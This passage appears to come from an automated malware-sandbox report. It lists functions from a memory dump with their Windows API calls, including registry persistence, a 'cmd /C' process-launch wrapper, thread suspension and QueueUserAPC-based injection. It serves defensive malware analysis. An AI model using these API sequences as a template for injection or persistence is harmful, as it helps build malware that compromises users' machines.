    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
    • Part of subcall function 001C5B7B: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001C5BA4
    • Part of subcall function 001C5B7B: memcpy.NTDLL(00000000,?,?), ref: 001C5BB7
    • Part of subcall function 001C5B7B: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5BC8
    • Part of subcall function 001C5B7B: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5BDD
    • Part of subcall function 001C5B7B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C5C15
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C8B4E, Relevance: 7.6, APIs: 5, Instructions: 125 Total matches: 56memory
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpy$RtlAllocateHeap
  • String ID:
  • API String ID: 1281497405-0
  • Opcode ID: c91cc279de764e5f2579d6076ec579c7e1ff7f10485d5d5ea4a8a547ad6caca9
  • Instruction ID: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
  • Opcode Fuzzy Hash: D1014E13C804C3878807342E9024AB8C449BE822C0DCDD316AA081C13F8BA232B7764F
  • Instruction Fuzzy Hash: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
APIs
    • Part of subcall function 001C8692: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C86CC
  • RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
  • memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
  • memcpy.NTDLL(00000000,?,?), ref: 001C8C27
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C45F0, Relevance: 7.6, APIs: 5, Instructions: 121 Total matches: 58memoryregistrysynchronization
Similarity
  • Total matches: 58
  • API ID: HeapFree$RegCloseKeyWaitForSingleObject
  • String ID:
  • API String ID: 3052965740-0
  • Opcode ID: d3c070adaf0f083c3fd626d879ba680c8654bd575e600ed9f9379d1952a7449c
  • Instruction ID: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
  • Opcode Fuzzy Hash: 1B01F521055AD313C12BA88192BA3FA8505BF829E1D4D1737FEB81E18C5F4721E6A707
  • Instruction Fuzzy Hash: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • HeapFree.KERNEL32(00000000,?), ref: 001C46AF
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
  • HeapFree.KERNEL32(00000000,?), ref: 001C473C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
  • RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7878, Relevance: 7.6, APIs: 5, Instructions: 107 Total matches: 58memorystring
Similarity
  • Total matches: 58
  • API ID: HeapFree$RtlAllocateHeaplstrlenwsprintf
  • String ID:
  • API String ID: 4063120414-0
  • Opcode ID: 82a566ac4b7e44f40389d82a26e71ca4d0b382ca24f9de814279e5df00d9b999
  • Instruction ID: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
  • Opcode Fuzzy Hash: 10F0F4A4112C418A8C56A6F1989CB7852C85B925FDD4E3313A76C314EB3B13335EBE4D
  • Instruction Fuzzy Hash: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • lstrlen.KERNEL32(00000000,001ECDBE,00000000,001ECDAC,00000000,001ECD98,00000000,001ECE3B,00000000,001ECE30,00000000,001ECD88,00000000,00002334), ref: 001C792A
  • RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 001C793F
  • wsprintfA.USER32 ref: 001C7954
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C796E
    • Part of subcall function 001C7664: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
    • Part of subcall function 001C7664: GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7998
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C439B, Relevance: 7.6, APIs: 5, Instructions: 98 Total matches: 56timememory
Similarity
  • Total matches: 56
  • API ID: CreateWaitableTimerGetLastErrorGetSystemTimeAsFileTimeHeapFreeOpenWaitableTimer
  • String ID:
  • API String ID: 1165046961-0
  • Opcode ID: dcf0f1391520f43fe6097fd0f752f71d1dc6f160b6cfea933156b7ea3217ac6e
  • Instruction ID: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
  • Opcode Fuzzy Hash: 3BF02BA00A858783E07B64608177BB58300EBC25D5D8C2733F65D5DB5D8F46B1A2FA25
  • Instruction Fuzzy Hash: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
APIs
  • OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
  • CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
  • GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
  • HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
    • Part of subcall function 001C4349: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C4356
    • Part of subcall function 001C4349: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 001C4390
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C9F0B, Relevance: 7.6, APIs: 5, Instructions: 95 Total matches: 59memorystring
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrcpylstrcpynlstrlen
  • String ID:
  • API String ID: 2577868549-0
  • Opcode ID: 1d80e047f999f10d401b9f46cfff4084342c566a149a0ba19b39b0a0f7985056
  • Instruction ID: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
  • Opcode Fuzzy Hash: C6F08B2B448E429BC027204202A67D8E71CBB818DAC4D8B319884795AE2EC272225B0A
  • Instruction Fuzzy Hash: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000007), ref: 001C9F8D
  • lstrcpy.KERNEL32(00000000,001EC424), ref: 001C9F9F
  • lstrcpyn.KERNEL32(00000006,?,00000001,?,?,?,?,?,00000000,00000000,?), ref: 001C9FAC
  • lstrlen.KERNEL32(001EC424,?,?,?,?,?,00000000,00000000,?), ref: 001C9FBE
    • Part of subcall function 001CA73F: RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
    • Part of subcall function 001CA73F: wsprintfA.USER32 ref: 001CA775
    • Part of subcall function 001CA73F: RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
    • Part of subcall function 001CA73F: RegCloseKey.ADVAPI32(?), ref: 001CA7B5
    • Part of subcall function 001CA73F: HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C9FEF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C44E2, Relevance: 7.6, APIs: 5, Instructions: 90 Total matches: 117synchronization
Similarity
  • Total matches: 117
  • API ID: GetLastError$CloseHandleReleaseMutexWaitForMultipleObjects
  • String ID:
  • API String ID: 981764843-0
  • Opcode ID: e0028ebea731b05e1f81d164d1b0c22b432d0313b7510209d972350b2e9e1cbf
  • Instruction ID: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
  • Opcode Fuzzy Hash: 63F06276110C810BCE276554A46279A5A106FC23F048C1753FFF66A1EF1B527AD21B8A
  • Instruction Fuzzy Hash: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
APIs
    • Part of subcall function 001C44A4: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 001C44B0
    • Part of subcall function 001C44A4: SetLastError.KERNEL32(000000B7,?,001C44F5), ref: 001C44C1
    • Part of subcall function 001C44A4: CreateMutexA.KERNEL32(001EB0D8,00000000,?,?,001C44F5), ref: 001C44D4
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C4515
  • CloseHandle.KERNEL32(00000000), ref: 001C45D3
    • Part of subcall function 001C439B: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
    • Part of subcall function 001C439B: CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
    • Part of subcall function 001C439B: GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C439B: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
    • Part of subcall function 001C439B: HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
  • GetLastError.KERNEL32 ref: 001C45BC
  • ReleaseMutex.KERNEL32(00000000), ref: 001C45C5
  • GetLastError.KERNEL32 ref: 001C45E0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CAD95, Relevance: 7.6, APIs: 5, Instructions: 85 Total matches: 58memorystring
Similarity
  • Total matches: 58
  • API ID: memcpy$HeapFreeRtlAllocateHeaplstrcmpi
  • String ID:
  • API String ID: 857938089-0
  • Opcode ID: 4b4a78c487d6048ee3f3895cdad3a98188a4a88c0ba2f47e4ae26dadc0163ad9
  • Instruction ID: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
  • Opcode Fuzzy Hash: C5F09E214D05C251D61B10B45894B94E946FE823B3C8DA7379C047908B2A4221A9B5EF
  • Instruction Fuzzy Hash: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,?,001ED278), ref: 001CADC5
  • memcpy.NTDLL(00000000,?,?), ref: 001CADD6
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
  • lstrcmpi.KERNEL32(00000002,?), ref: 001CAE1C
  • memcpy.NTDLL(00000000,?,?), ref: 001CAE30
  • HeapFree.KERNEL32(00000000,00000000,001ED278), ref: 001CAE6F
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DC4E7, Relevance: 7.6, APIs: 5, Instructions: 81 Total matches: 95
Similarity
  • Total matches: 95
  • API ID: CloseHandleGetLastError$OpenProcess
  • String ID:
  • API String ID: 3618605412-0
  • Opcode ID: f3c28a13a8270d655170a0e3c90d88c5c03aaf1802dd5309b87f7072ec2badc3
  • Instruction ID: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
  • Opcode Fuzzy Hash: 13F09E78181666838027B06098507FBF645FE821CF6AC3610F6603108A47563AD76754
  • Instruction Fuzzy Hash: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
APIs
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000001), ref: 001DC517
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC59A
    • Part of subcall function 001DC371: memset.NTDLL ref: 001DC393
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
    • Part of subcall function 001DC371: WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
    • Part of subcall function 001DC371: SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001DC371: GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(00000004), ref: 001DC4D6
  • CloseHandle.KERNEL32(00000000), ref: 001DC592
  • CloseHandle.KERNEL32(?), ref: 001DC5AD
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC5B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB410, Relevance: 7.6, APIs: 5, Instructions: 74 Total matches: 26thread
Similarity
  • Total matches: 26
  • API ID: CloseHandleCreateThreadGetCommandLineGetLastErrorGetModuleHandle
  • String ID:
  • API String ID: 3688636283-0
  • Opcode ID: 8985e94ed4e404b0795d5a875a1daa6f27baf4ecdfa99c2ebdf40c8ebc5b8d94
  • Instruction ID: 283d28c9ebffde5815507237fddad0c111e69e01867ba4e75a4d178179002479
  • Opcode Fuzzy Hash: 55E0DCF28AC2C40BA8172662105D30B034AAB811E6AEC0393D361F00A6BB0F22DB5D4A
  • Instruction Fuzzy Hash: 283d28c9ebffde5815507237fddad0c111e69e01867ba4e75a4d178179002479
APIs
  • GetModuleHandleA.KERNEL32(001EC88E,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB44F
    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
  • GetCommandLineW.KERNEL32(00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB466
  • CreateThread.KERNEL32(00000000,00000000,001C6C08,00000000,00000000,001CD6FE), ref: 001CB485
  • CloseHandle.KERNEL32(00000000), ref: 001CB490
  • GetLastError.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB498
    • Part of subcall function 001C6241: GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
    • Part of subcall function 001C6241: TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
    • Part of subcall function 001CB35F: CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
    • Part of subcall function 001CB35F: GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
    • Part of subcall function 001CB35F: GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
    • Part of subcall function 001CB35F: Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
    • Part of subcall function 001CB35F: OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
    • Part of subcall function 001CB35F: QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
    • Part of subcall function 001CB35F: Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
    • Part of subcall function 001C8215: TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C822A
    • Part of subcall function 001C47EC: memcpy.NTDLL(001EA06C,?,00000028,00000000,001EC1F2,?,001CD6FE,?,?,00000000,001CB4E0,00000000,00000000), ref: 001C481E
    • Part of subcall function 001C47EC: HeapFree.KERNEL32(00000000,?,001EC1F2), ref: 001C484F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D6D18, Relevance: 7.6, APIs: 5, Instructions: 72 Total matches: 377file
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 0e249ffb26827f8de4bdc9f10efd9553abeea1975b9e130743c481de3b32f60c
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E0C010A20A86DED45B5CA04402F45EF06AF50149D9C3E65B500153674F01736AAB29
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D6D36
  • GetFileSize.KERNEL32(00000000,00000000,?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000), ref: 001D6D46
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001D6D72
  • GetLastError.KERNEL32(?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000,00000000), ref: 001D6D97
  • CloseHandle.KERNEL32(000000FF), ref: 001D6DA8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C848E, Relevance: 7.6, APIs: 5, Instructions: 67 Total matches: 56memorysynchronization
Similarity
  • Total matches: 56
  • API ID: GetLastError$HeapFreeRtlAllocateHeapWaitForSingleObject
  • String ID:
  • API String ID: 1129198028-0
  • Opcode ID: e3a02cbeabdfe4a2cd864ccd1553d94aed3507c904c4d03dee893086ea269868
  • Instruction ID: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
  • Opcode Fuzzy Hash: C7E05C64444FC296C00FB62559903FB5B466F41BD3D4C5623B8042404D3F4633F7296E
  • Instruction Fuzzy Hash: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000), ref: 001C84BC
  • GetLastError.KERNEL32 ref: 001C84DF
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001C84F2
  • GetLastError.KERNEL32 ref: 001C84FD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8545
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C11B3, Relevance: 7.6, APIs: 5, Instructions: 65 Total matches: 61filememory
Similarity
  • Total matches: 61
  • API ID: CreateDirectoryDeleteFileGetLastErrorHeapFreeRemoveDirectory
  • String ID:
  • API String ID: 4079355387-0
  • Opcode ID: 8c67f55a15a2c5e2e65c1e56377dd64d01b0e2d18364e0ba4940ce76a46808fc
  • Instruction ID: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
  • Opcode Fuzzy Hash: B9E0C9764404804A4CA7D8A9A86C27E458316539E2C0D4335F5793B8A7DEA129BE0F93
  • Instruction Fuzzy Hash: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • DeleteFileA.KERNEL32(00000000,000004D2), ref: 001C11D6
  • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 001C11DF
  • GetLastError.KERNEL32 ref: 001C11E9
    • Part of subcall function 001C1000: lstrcpy.KERNEL32(00000000,?), ref: 001C1046
    • Part of subcall function 001C1000: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1115
    • Part of subcall function 001C1000: CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 001C1145
    • Part of subcall function 001C1000: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 001C115E
    • Part of subcall function 001C1000: CloseHandle.KERNEL32(00000000), ref: 001C1168
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C1178
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,00000000), ref: 001C1193
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C11A3
    • Part of subcall function 001C771B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
    • Part of subcall function 001C771B: lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
    • Part of subcall function 001C771B: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
    • Part of subcall function 001C771B: mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
    • Part of subcall function 001C771B: CloseHandle.KERNEL32(?), ref: 001C77C0
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
  • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000004), ref: 001C125E
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C126D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7B90, Relevance: 7.6, APIs: 5, Instructions: 62 Total matches: 57memorystringtime
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeHeapFreeRtlAllocateHeaplstrlenmemcpy
  • String ID:
  • API String ID: 469818408-0
  • Opcode ID: f1f47f5e13992d98d78fab90320651e280bece1f12eb0609cccb7f77c9a22763
  • Instruction ID: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
  • Opcode Fuzzy Hash: 7DE02629491513D7082B292E5858B3CE612FDF32E650C2373E6002E18B0B8233B55E6F
  • Instruction Fuzzy Hash: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
APIs
  • GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
  • memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
  • RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
  • lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B34B73, Relevance: 7.6, APIs: 5, Instructions: 59 Total matches: 218stringthreadtime
Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: a7ba591b065612ca5392502f724a25a23db9ce2fa7cff4761a80896cec28b3f4
  • Instruction ID: 66f2c6aac88ed1bd9334c7600f51663f9dc178801934e8592d4354f33624fdca
  • Opcode Fuzzy Hash: 51D05B95471CC4D3595E459D102515290C66C6530619CF5467751397655B30305CEF6D
  • Instruction Fuzzy Hash: 66f2c6aac88ed1bd9334c7600f51663f9dc178801934e8592d4354f33624fdca
APIs
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
